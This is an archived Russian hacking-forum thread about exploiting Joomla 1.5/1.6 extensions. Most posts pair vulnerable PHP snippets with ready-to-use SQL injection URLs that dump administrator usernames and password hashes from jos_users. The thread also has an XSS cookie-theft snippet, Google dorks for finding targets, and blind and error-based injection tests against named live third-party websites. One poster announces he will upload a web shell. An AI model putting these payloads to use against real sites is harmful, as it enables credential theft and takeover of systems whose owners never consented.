ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
26.08.2011, 19:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
5429
Репутация:
-1
|
|
[B]Joomla 1.5 com_virtuemart
|
|
|
|
27.08.2011, 03:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
18928
Репутация:
3
|
|
XSS vulnerability in JComments
Уязвимые верси: 2.1.0.0 [07/08/2009] и, возможно, ранние
Уведомление JoomlaTune.com: 4 Июня 2011
Тип уязвимости: XSS
Статус: исправлено JoomlaTune.com
Степень опасности: Средний
Детали уязвимости: пользователь может выполнить произвольный JS код в уязвимом приложении. Уязвимость возникает из-за неправильной идентификации пользователя в "admin.jcomments.php". Успешное проведение атаки с помощью данной уязвимости может привести к потере конфиденциальных данных и краже идентификационной информации в виде куков.
Атакующий может использовать браузер для проведения атаки:
Код:
alert(document.cookie)'>
document.main.submit();
Решение: обновление к более поздней версии
|
|
|
|
05.09.2011, 00:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
4100
Репутация:
74
|
|
Понеслась...
1 :: com_messaging :: SQL-inj && v1.5
com_messaging.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
require_once([/COLOR][COLOR="#0000BB"]dirname[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]__FILE__[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#0000BB"]DS[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'helper.php'[/COLOR][COLOR="#007700"]);
...
[/COLOR][COLOR="#0000BB"]$params[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mesuid'[/COLOR][COLOR="#007700"]];
...
[/COLOR][COLOR="#0000BB"]$messages[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]modMessagingHelper[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getMessaging[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$params[/COLOR][COLOR="#007700"]);
...
[/COLOR][/COLOR]
helper.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]guest[/COLOR][COLOR="#007700"]){
return -[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];
}else{
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]" SELECT * FROM #__messaging WHERE idTo='[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]' AND seen=0 ORDER BY date DESC"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$_db[/COLOR][COLOR="#007700"]= &[/COLOR][COLOR="#0000BB"]JFactory[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getDBO[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$_db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setQuery[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]loadObjectList[/COLOR][COLOR="#007700"]();
return[/COLOR][COLOR="#0000BB"]sizeof[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]);
}
}
}
[/COLOR][COLOR="#0000BB"]?>
[/COLOR][/COLOR]
exploit:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//j15/index.php?option=com_messaging&view=message&mesuid=-666++union+select+1,group_concat(username,0x3a,password+SEPARATOR+0x3c62723e),3,4,5,6,7,8,9+from+jos_users+where+usertype=0x53757065722041646D696E6973747261746F72--
[/COLOR][/COLOR]
2 :: com_azcontentlist :: SQL-inj && v1.5
azcontentlist.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]JDate[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$now[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]toMySQL[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$database[/COLOR][COLOR="#007700"]=&[/COLOR][COLOR="#0000BB"]JFactory[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getDBO[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$nullDate[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$database[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getNullDate[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$database[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setQuery[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT c.title AS title, c.id, c.catid, c.sectionid, cc.title AS category, s.title AS section FROM #__content AS c"
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' LEFT JOIN #__categories AS cc ON cc.id = c.catid'
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' LEFT JOIN #__sections AS s ON s.id = c.sectionid'
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" WHERE c.access = 0 AND c.state = 1"
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' AND cc.access = 0'
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' AND s.access = 0'
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" AND ( publish_up = "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'date'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]" OR publish_up [/COLOR][COLOR="#0000BB"]Quote[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$now[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]" )"
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" ORDER BY title"
[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$results[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$database[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]loadAssocList[/COLOR][COLOR="#007700"]();
echo[/COLOR][COLOR="#DD0000"]'A-Z Site Map'[/COLOR][COLOR="#007700"];
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
foreach([/COLOR][COLOR="#0000BB"]$results[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#FF8000"]//$app =& JFactory::getApplication();
//$Itemid = $app->getItemid( $result['id'] );
[/COLOR][COLOR="#007700"]...
[/COLOR][/COLOR]
exploit:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//j15/index.php?option=com_azcontentlist&view=title&cat=3&date=-666++union+select+1,2,3,4,group_concat(username,0x3a,password+SEPARATOR+0x3c62723e),6,7+from+jos_users+where+usertype=0x53757065722041646D696E6973747261746F72--
[/COLOR][/COLOR]
3 :: Jootags component :: SQL-inj && v1.5
tags.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
function[/COLOR][COLOR="#0000BB"]getTagByTitle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$title[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]' SELECT t.id '
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' FROM #__jootags_tags AS t '
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" WHERE t.title='[/COLOR][COLOR="#0000BB"]$title[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setQuery[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);
return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]LoadResult[/COLOR][COLOR="#007700"]();
}
...
[/COLOR][/COLOR]
controller.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$document[/COLOR][COLOR="#007700"]=&[/COLOR][COLOR="#0000BB"]JFactory[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getDocument[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$viewType[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$document[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getType[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$viewName[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]JRequest[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getCmd[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'view'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getName[/COLOR][COLOR="#007700"]() );
[/COLOR][COLOR="#0000BB"]$viewLayout[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]JRequest[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getCmd[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'layout'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'default'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$params[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]JComponentHelper[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getParams[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'com_jootags'[/COLOR][COLOR="#007700"]);;
[/COLOR][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]= &[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getView[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$viewName[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$viewType[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"], array([/COLOR][COLOR="#DD0000"]'base_path'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_basePath[/COLOR][COLOR="#007700"]));
if ([/COLOR][COLOR="#0000BB"]$model[/COLOR][COLOR="#007700"]= &[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getModel[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'tags'[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setModel[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$model[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]);
}
=====>>>> list([/COLOR][COLOR="#0000BB"]$tag_id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$tag_title[/COLOR][COLOR="#007700"]) =[/COLOR][COLOR="#0000BB"]$model[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getTagByTitle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'tag'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$items[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"];
if ([/COLOR][COLOR="#0000BB"]$tag_id[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$items[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$model[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getData[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tag_id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$limitstart[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$limit[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$document[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setTitle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tag_title[/COLOR][COLOR="#007700"]);
} else {
[/COLOR][COLOR="#0000BB"]$document[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setTitle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]JText[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Tags'[/COLOR][COLOR="#007700"]));
}
[/COLOR][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setLayout[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$viewLayout[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]display[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$items[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$params[/COLOR][COLOR="#007700"]);
...
[/COLOR][/COLOR]
exploit:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//j15/index.php?option=com_jootags&itemid=8&view=model&tag=-666++union+select+1,2,3,4,5,6,7,group_concat(username,0x3a,password+SEPARATOR+0x3c62723e),9,10,11,12+from+jos_users+where+usertype=0x53757065722041646D696E6973747261746F72--
[/COLOR][/COLOR]
Достаем url ресурса из БД.
Кто знает - поймет. Ох сколько я мучался найдя таблицы джумлы в базе, на которую ссылается, к примеру, какой-нибудь wp'шный сайт. И как всегда - ответ перед носом!
SELECT link FROM jos_menu WHERE alias = adminlink [version 1.5]
На выходе увидите урл админки, конечно же с текущим ресурсом!
p.s. z0mbyak, если ты это знал и не запостил где-нить...ц...на сколько ж я ресурсов забил из-за этого...ты бы знал...
============
UPDATE #1
Такс...то что выше - это для версии 1.5
SELECT link FROM jos_menu WHERE title = admin [version 1.6]
============
UPDATE #2 (метод для всех веток)
Код:
Code:
SELECT name FROM u158069.joomla_menu LIMIT 0,1 (а)
SELECT link FROM u158069.joomla_menu LIMIT 0,1 (b)
Код:
Code:
dork: inurl:b intext:a
|
|
|
|
12.09.2011, 03:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
4100
Репутация:
74
|
|
com_email-directory SQL-inj [1.5 && 1.6]
image.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]) && ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]] >[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#FF8000"]// formula string
[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_connect[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$mosConfig_host[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$mosConfig_user[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$mosConfig_password[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#DD0000"]"Could not connect"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]mysql_select_db[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$mosConfig_db[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#DD0000"]"Could not select database"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT email FROM[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$mosConfig_dbprefix[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]emails_list WHERE id='[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#DD0000"]"MySQL query: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" failed with error: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_object[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]email[/COLOR][COLOR="#007700"];
} else {
[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
}
...
[/COLOR][/COLOR]
exploit:
Код:
Code:
http://j15/index.php?option=com_emaildirectory&nshow=image&view=photos&id=-666++union+select+group_concat(username,0x3a,password+SEPARATOR+0x3c62723e)+from+jos_users+where+usertype=0x53757065722041646D696E6973747261746F72--
com_eventsmailer SQL-inj in LIMIT [1.5]
simpleshow.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
function[/COLOR][COLOR="#0000BB"]getAdminSettings[/COLOR][COLOR="#007700"]() {
[/COLOR][COLOR="#0000BB"]$database[/COLOR][COLOR="#007700"]=&[/COLOR][COLOR="#0000BB"]JFactory[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getDBO[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM #__eventsmailer LIMIT[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'max']"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$database[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setQuery[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$database[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]loadObjectList[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$settings[/COLOR][COLOR="#007700"]= array();
foreach([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]] as[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$settings[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"];
}
return[/COLOR][COLOR="#0000BB"]$settings[/COLOR][COLOR="#007700"];
}
...
[/COLOR][/COLOR]
exploit:
Код:
Code:
http://j15/index.php?option=com_eventsmailer&view=events&max=-666666666++union+select+1,2,3,group_concat(username,0x3a,password+SEPARATOR+0x3c62723e),5,6,7+from+jos_users+where+usertype=0x53757065722041646D696E6973747261746F72--
com_greetbox SQL-inj in LIMIT [1.5 && 1.6]
funcs.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]=&[/COLOR][COLOR="#0000BB"]JFactory[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getDBO[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$component_params[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]JComponentHelper[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getParams[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'com_greetbox'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$greeting[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$component_params[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'default_greeting'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$fromsite[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_REFERER'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"select * from #__greetbox LIMIT[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mva'l]"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setQuery[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$myrows[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]loadObjectList[/COLOR][COLOR="#007700"]();
foreach([/COLOR][COLOR="#0000BB"]$myrows[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$myrow[/COLOR][COLOR="#007700"]){
[/COLOR][COLOR="#0000BB"]$pattern[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]preg_quote[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$myrow[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]pattern[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/[/COLOR][COLOR="#0000BB"]$pattern[/COLOR][COLOR="#DD0000"]/"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$fromsite[/COLOR][COLOR="#007700"])){
[/COLOR][COLOR="#0000BB"]$greeting[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$myrow[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]greeting[/COLOR][COLOR="#007700"];
break;
}
}
...
[/COLOR][/COLOR]
exploit:
Код:
Code:
http://j15/index.php?option=com_greetbox&view=boxes&mval=-999999999+union+select+1,2,3,4,5,group_concat(username,0x3a,password+SEPARATOR+0x3c62723e),7,8,9+from+jos_users+where+usertype=0x53757065722041646D696E6973747261746F72--
|
|
|
|
14.09.2011, 20:20
|
|
Постоянный
Регистрация: 02.05.2005
Сообщений: 786
Провел на форуме:
807041
Репутация:
263
|
|
http://www.exploit-db.com/exploits/16992/
кто подскажет как пользоваться этим? если можно более детально, ...
С Уважением Силверан...
|
|
|
14.09.2011, 21:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от silveran
silveran said:
http://www.exploit-db.com/exploits/16992/
кто подскажет как пользоваться этим? если можно более детально, ...
С Уважением Силверан...
Код:
Code:
http://site/index.php/using-joomla/extensions/components/content-component/article-category-list/?filter_order=(select(max(1))from(mysql.user)group+by(concat(version(),0x00,floor(rand(0)*2))))--+&filter_order_Dir=2&limit=3&limitstart=4
|
|
|
|
18.11.2011, 11:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
4100
Репутация:
74
|
|
com_amdownloadersql-inj
vurnel.param: pathid
Код:
Code:
http://adatmagus.hu/jm/index.php?option=com_amdownloader&task=showfiles&pathid=-8 UNION SELECT 1,2,group_concat(username,0x3a,password separator 0x3c62723e),4 from jos_users --
|
|
|
|
31.12.2011, 22:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
149611
Репутация:
81
|
|
[COLOR="YellowGreen"][SIZE="3"]Blind SQL Injection в Joomla
Example:
Сообщение от None
http://autoschooler.ru/component/blog_calendar/?year=2011&month=12&modid=23+and%20mid(version(),1 ,1)=5+--+
True
Сообщение от None
http://autoschooler.ru/component/blog_calendar/?year=2011&month=12&modid=23+and%20mid(version(),1 ,1)=4+--+
False
-----------------------------------------------------------
(c) By Osstudio & Er9j6@.
З.Ы С новым годом! |
|
|
|
01.01.2012, 11:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от Osstudio
Osstudio said:
(Он вроде встроенный..)
Нет, не встроенный. Уязвимый код(вроде) в view.html.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
if([/COLOR][COLOR="#0000BB"]$modid[/COLOR][COLOR="#007700"]){[/COLOR][COLOR="#FF8000"]//if the component is called from the a Blog Calendar module, load the parameters of that module
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'SELECT params'
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' FROM #__modules'
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' WHERE id = '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$modid[/COLOR][COLOR="#007700"];
...
[/COLOR][/COLOR]
Dork: inurl:component/blog_calendar/
P.S.
FALSE
Код:
Code:
http://meirbruk.net/en/component/blog_calendar/?year=2011&month=09&modid=250+union+select+1,2--+f
TRUE
Код:
Code:
http://meirbruk.net/en/component/blog_calendar/?year=2011&month=09&modid=250+union+select+1--+f
Увидев это попробовал error-based, как ни странно, пашет все:
Код:
Code:
http://meirbruk.net/en/component/blog_calendar/?year=2011&month=09&modid=250+and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--
Результат:
Код:
Code:
Duplicate entry 'COLLATIONS1' for key
Вывод, если включен дебаг, то можно обойтись без blind. Сейчас залью шелл и посмотрю версию на сайте выше...
UPD. При error-based, как известно, выводится 64 символов. А в joomla hash:salt имеет длину в 65 символов Вот такая ирония, юзайте blind...
|
|
|
|
01.01.2012, 14:55
|
|
Guest
Сообщений: n/a
